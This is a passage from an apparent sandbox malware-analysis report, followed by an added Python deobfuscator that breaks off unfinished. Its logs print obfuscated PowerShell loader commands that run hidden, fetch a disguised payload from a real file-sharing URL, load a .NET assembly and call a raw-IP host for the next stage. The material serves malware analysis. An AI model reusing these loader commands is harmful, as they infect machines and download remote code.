          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1703698894.000000000755E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.1840311611.0000000007B14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbP source: powershell.exe, 00000009.00000002.1843718646.0000000008B5F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000009.00000002.1840311611.0000000007B14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.pdb source: powershell.exe, 00000001.00000002.1811106062.00000000049F8000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: System.pdbJ source: powershell.exe, 00000009.00000002.1816997416.0000000003488000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.1843718646.0000000008B5F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.1816997416.00000000034B4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbRgx source: powershell.exe, 00000003.00000002.1705324938.000000000847D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ll\mscorlib.pdb source: powershell.exe, 00000009.00000002.1843718646.0000000008B50000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.1816997416.00000000034B4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdb source: powershell.exe, 00000009.00000002.1840311611.0000000007B14000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, Dfwdesativado
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($base64Reversed);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.RTCCCRV/622/512.821.
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
          Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))"
          Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))"
          Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))"
          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
          Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))"
          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_04C05665 push eax; iretd 3_2_04C05699
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.dll
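The stage-2 powershell.exe command line listed above (the `-windowstyle hidden -executionpolicy bypass -NoProfile` entry) hides its script behind three layers: the literal is assembled from `'+'`-joined fragments; the tokens Dfw, N9Y and hGa stand in for the single quote, the pipe and `$`, with the real characters supplied only as `[Char]` codes on the `-creplace`/`-replace` operands so that none of them appears in the raw text; and the result is piped to `.( $eNv:comsPEc[4,24,25]-JoIn'')`, which indexes the default `%ComSpec%` value `C:\Windows\system32\cmd.exe` to spell `iex`. The Python below is an added example written for this page, not code from the report or from the sample; it re-implements those transformations statically so the script can be read without running it, and then pulls the network indicators out of the result, including reversing the first argument passed to `[dnlib.IO.Home]::VAI`. The command text is copied from the report entry; the `COMSPEC_DEFAULT` value and the function names are this example's own assumptions.

```python
"""Static deobfuscation of the stage-2 PowerShell command from this report.

Added example for this page (not part of the Joe Sandbox report or of the
sample). STAGE2 is the -command argument copied from the report; the only
environmental assumption is that %ComSpec% has its stock value.
"""
import re

COMSPEC_DEFAULT = r"C:\Windows\system32\cmd.exe"  # assumption: default Windows value

# Contents of the -command "..." argument, copied verbatim from the report entry.
STAGE2 = (
    "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'"
    "+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true"
    "&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object "
    "System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);"
    "hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);"
    "hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;"
    "hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);"
    "hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);"
    "hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;"
    "hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;"
    "hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);"
    "hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })"
    "[-1..-(hGabase64Command.Length)];"
    "hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);"
    "hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);"
    "hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);"
    "hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, "
    "DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, "
    "DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,"
    "DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') "
    "-cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124"
    "-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
)

CHAR_TOKEN = re.compile(r"\[char\](0x[0-9a-f]+|\d+)", re.I)
OPERAND = r"(\([^)]*\)|'[^']*'|\[char\]\w+)"
REPLACE_OP = re.compile(r"-(c?)replace\s*" + OPERAND + r"\s*,\s*" + OPERAND, re.I)
# (('literal') -replace ... )| .( $env:comspec[i,j,k] -join '' )
OUTER = re.compile(
    r"^\(\(('(?:[^']|'\+')*')\)(.*)\|\s*\.\(\s*\$env:comspec\[([\d,]+)\]\s*-join\s*''\s*\)\s*$",
    re.I | re.S,
)


def resolve_operand(token):
    """Evaluate a replace operand: 'literal', [Char]N, or ([Char]A+[Char]B+...)."""
    token = token.strip().strip("()")
    if token.startswith("'") and token.endswith("'"):
        return token[1:-1]
    return "".join(chr(int(c, 16) if c.lower().startswith("0x") else int(c))
                   for c in CHAR_TOKEN.findall(token))


def deobfuscate(command):
    """Return (clean_script, invoked_cmdlet) for the layout described above."""
    m = OUTER.match(command.strip())
    if not m:
        raise ValueError("command does not match the expected obfuscation layout")
    literal, chain, indices = m.group(1), m.group(2), m.group(3)
    # 1. collapse the 'a'+'b' fragment concatenation into one literal
    script = literal[1:-1].replace("'+'", "")
    # 2. apply the -creplace / -replace operators left to right; PowerShell treats the
    #    pattern as a regex, case-sensitive for -creplace and case-insensitive for -replace
    for case_sensitive, pattern, repl in REPLACE_OP.findall(chain):
        pat, rep = resolve_operand(pattern), resolve_operand(repl)
        script = re.sub(pat, lambda _m, r=rep: r, script, flags=0 if case_sensitive else re.I)
    # 3. $env:ComSpec[4,24,25] -join '' spells the cmdlet the script is piped into
    invoked = "".join(COMSPEC_DEFAULT[int(i)] for i in indices.split(","))
    return script, invoked


def extract_indicators(script):
    """Pull the download URL, payload markers and the VAI arguments out of the clean script."""
    url = re.search(r"\$imageUrl = '([^']*)'", script).group(1).strip()
    markers = re.findall(r"<<[A-Z0-9_]+>>", script)
    raw_args = re.search(r"\.Invoke\(\$null, @\((.*?)\)\);", script).group(1)
    args = [a.strip().strip("'") for a in raw_args.split(",")]
    return {
        "download_url": url,
        "markers": markers,
        "vai_args": args,
        "next_stage_url": args[0][::-1],  # the first VAI argument is stored reversed
    }


if __name__ == "__main__":
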